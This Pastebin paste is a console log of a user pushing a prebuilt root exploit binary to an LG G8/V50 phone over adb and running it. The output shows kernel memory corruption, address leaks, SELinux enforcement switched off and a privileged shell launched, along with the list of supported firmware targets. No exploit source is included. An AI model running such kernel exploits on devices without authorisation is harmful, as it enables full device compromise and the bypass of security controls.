API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 16th, 2020
350
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.63 KB | None | 0 0
raw download clone embed print report
  1. [+] factoryversion = 'LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1'
  2. [+] forced use of 'LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0' target
  3. [+] Mapped 200000
  4. [+] selinux_enforcing before exploit: 1
  5. sched_setafinnity(): Invalid argument
  6. sched_setafinnity(): Invalid argument
  7. sched_setafinnity(): Invalid argument
  8. sched_setafinnity(): Invalid argument
  9. sched_setafinnity(): Invalid argument
  10. sched_setafinnity(): Invalid argument
  11. sched_setafinnity(): Invalid argument
  12. sched_setafinnity(): Invalid argument
  13. sched_setafinnity(): Invalid argument
  14. sched_setafinnity(): Invalid argument
  15. sched_setafinnity(): Invalid argument
  16. sched_setafinnity(): Invalid argument
  17. sched_setafinnity(): Invalid argument
  18. sched_setafinnity(): Invalid argument
  19. sched_setafinnity(): Invalid argument
  20. sched_setafinnity(): Invalid argument
  21. sched_setafinnity(): Invalid argument
  22. sched_setafinnity(): Invalid argument
  23. sched_setafinnity(): Invalid argument
  24. sched_setafinnity(): Invalid argument
  25. sched_setafinnity(): Invalid argument
  26. sched_setafinnity(): Invalid argument
  27. sched_setafinnity(): Invalid argument
  28. sched_setafinnity(): Invalid argument
  29. sched_setafinnity(): Invalid argument
  30. sched_setafinnity(): Invalid argument
  31. sched_setafinnity(): Invalid argument
  32. sched_setafinnity(): Invalid argument
  33. sched_setafinnity(): Invalid argument
  34. sched_setafinnity(): Invalid argument
  35. sched_setafinnity(): Invalid argument
  36. sched_setafinnity(): Invalid argument
  37. sched_setafinnity(): Invalid argument
  38. sched_setafinnity(): Invalid argument
  39. sched_setafinnity(): Invalid argument
  40. sched_setafinnity(): Invalid argument
  41. sched_setafinnity(): Invalid argument
  42. sched_setafinnity(): Invalid argument
  43. sched_setafinnity(): Invalid argument
  44. sched_setafinnity(): Invalid argument
  45. sched_setafinnity(): Invalid argument
  46. sched_setafinnity(): Invalid argument
  47. sched_setafinnity(): Invalid argument
  48. sched_setafinnity(): Invalid argument
  49. sched_setafinnity(): Invalid argument
  50. sched_setafinnity(): Invalid argument
  51. sched_setafinnity(): Invalid argument
  52. sched_setafinnity(): Invalid argument
  53. sched_setafinnity(): Invalid argument
  54. sched_setafinnity(): Invalid argument
  55. sched_setafinnity(): Invalid argument
  56. sched_setafinnity(): Invalid argument
  57. sched_setafinnity(): Invalid argument
  58. sched_setafinnity(): Invalid argument
  59. sched_setafinnity(): Invalid argument
  60. [+] pipe file: 0xffffffdee35a3a00
  61. [*] file epitem at ffffffdeeb2bd100
  62. [*] Reallocating content of 'write8_inode' with controlled data..[DONE]
  63. [+] Overwriting 0xffffffdee35a3a20 with 0xffffffdeeb2bd150...[DONE]
  64. [*] Write done, should have arbitrary read now.
  65. [+] file operations: ffffff8c5c221050
  66. [+] kernel base: ffffff8c5ac7fe00
  67. PS C:\Users\sdk\platform-tools> adb push v50g8-root /data/local/tmp
  68. adb : The term 'adb' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
  69. spelling of the name, or if a path was included, verify that the path is correct and try again.
  70. At line:1 char:1
  71. + adb push v50g8-root /data/local/tmp
  72. + ~~~
  73. + CategoryInfo : ObjectNotFound: (adb:String) [], CommandNotFoundException
  74. + FullyQualifiedErrorId : CommandNotFoundException
  75.  
  76.  
  77. Suggestion [3,General]: The command adb was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type: ".\adb". See "get-help about_Command_Precedence" for more details.
  78. PS C:\Users\sdk\platform-tools> ./adb push v50g8-root /data/local/tmp
  79. v50g8-root: 1 file pushed, 0 skipped. 43.4 MB/s (42984 bytes in 0.001s)
  80. PS C:\Users\sdk\platform-tools> ./adb shell
  81. alphalm:/ $ cd /data/local/temp
  82. /system/bin/sh: cd: /data/local/temp: No such file or directory
  83. 2|alphalm:/ $ cd /data/local/tmp
  84. alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
  85. alphalm:/data/local/tmp $ ./v50g9-root -T
  86. /system/bin/sh: ./v50g9-root: inaccessible or not found
  87. 127|alphalm:/data/local/tmp $ ./v50g8-root -T
  88. supported targets:
  89. 0 : LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
  90. 1 : LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
  91. 2 : LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
  92. 3 : LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
  93. 4 : LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
  94. 5 : LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
  95. 6 : LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
  96. 7 : LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0
  97. 8 : LMV500AT-00-V20e-LAO-COM-JAN-23-2020+0
  98. 9 : LMV500AT-00-V20g-LAO-COM-MAR-10-2020+0
  99. 10 : LMV500NAT-00-V20b-LAO-COM-DEC-23-2019+0
  100. 11 : LMV500NAT-00-V20f-LAO-COM-JAN-31-2020+0
  101. 12 : LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
  102. alphalm:/data/local/tmp $ ./v50g8-root -t 2
  103. [+] factoryversion = 'LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1'
  104. [+] forced use of 'LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9' target
  105. [+] Mapped 200000
  106. [+] selinux_enforcing before exploit: 1
  107. sched_setafinnity(): Invalid argument
  108. sched_setafinnity(): Invalid argument
  109. sched_setafinnity(): Invalid argument
  110. sched_setafinnity(): Invalid argument
  111. sched_setafinnity(): Invalid argument
  112. sched_setafinnity(): Invalid argument
  113. sched_setafinnity(): Invalid argument
  114. sched_setafinnity(): Invalid argument
  115. sched_setafinnity(): Invalid argument
  116. sched_setafinnity(): Invalid argument
  117. sched_setafinnity(): Invalid argument
  118. sched_setafinnity(): Invalid argument
  119. sched_setafinnity(): Invalid argument
  120. sched_setafinnity(): Invalid argument
  121. sched_setafinnity(): Invalid argument
  122. sched_setafinnity(): Invalid argument
  123. sched_setafinnity(): Invalid argument
  124. sched_setafinnity(): Invalid argument
  125. sched_setafinnity(): Invalid argument
  126. sched_setafinnity(): Invalid argument
  127. sched_setafinnity(): Invalid argument
  128. sched_setafinnity(): Invalid argument
  129. sched_setafinnity(): Invalid argument
  130. sched_setafinnity(): Invalid argument
  131. sched_setafinnity(): Invalid argument
  132. sched_setafinnity(): Invalid argument
  133. sched_setafinnity(): Invalid argument
  134. sched_setafinnity(): Invalid argument
  135. sched_setafinnity(): Invalid argument
  136. sched_setafinnity(): Invalid argument
  137. sched_setafinnity(): Invalid argument
  138. sched_setafinnity(): Invalid argument
  139. sched_setafinnity(): Invalid argument
  140. sched_setafinnity(): Invalid argument
  141. sched_setafinnity(): Invalid argument
  142. sched_setafinnity(): Invalid argument
  143. sched_setafinnity(): Invalid argument
  144. [+] pipe file: 0xffffffd0a7c91c00
  145. [*] file epitem at ffffffd037f14e00
  146. [*] Reallocating content of 'write8_inode' with controlled data..[DONE]
  147. [+] Overwriting 0xffffffd0a7c91c20 with 0xffffffd037f14e50...[DONE]
  148. [*] Write done, should have arbitrary read now.
  149. [+] file operations: ffffff839aa21050
  150. [+] kernel base: ffffff8399480000
  151. [*] init_cred: ffffff839b82e588
  152. [+] memstart_addr: 0xfffffff080000000
  153. [+] First level entry: e8083003 -> next table at ffffffd068083000
  154. [+] Second level entry: e2b88003 -> next table at ffffffd062b88000
  155. [+] sysctl_table_root = ffffff839b85b098
  156. [*] Reallocating content of 'write8_sysctl' with controlled data...[DONE]
  157. [+] Overwriting 0xffffffd17534a868 with 0xffffffd0713b9000...[DONE]
  158. [+] Injected sysctl node!
  159. [*] Reallocating content of 'write8_selinux' with controlled data.....[DONE]
  160. [+] Overwriting 0xffffff839bfceffc with 0x0...[DONE]
  161. [*] Node write8_inode, pid 1313, kaddr ffffffd0eb722b00
  162. [*] Replaced sendmmsg dangling reference
  163. [*] Replaced sendmmsg dangling reference
  164. [*] Node write8_selinux, pid 1262, kaddr ffffffd15ec9c180
  165. [*] Replaced sendmmsg dangling reference
  166. [*] Replaced sendmmsg dangling reference
  167. [*] Node write8_sysctl, pid 1485, kaddr ffffffd12cd3d180
  168. [*] Replaced sendmmsg dangling reference
  169. [*] Replaced sendmmsg dangling reference
  170. [+] Cleaned up sendmsg threads
  171. [*] epitem.next = ffffffd0a7c91c20
  172. [*] epitem.prev = ffffffd0a7c91cd0
  173. [*] Launching privileged shell
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!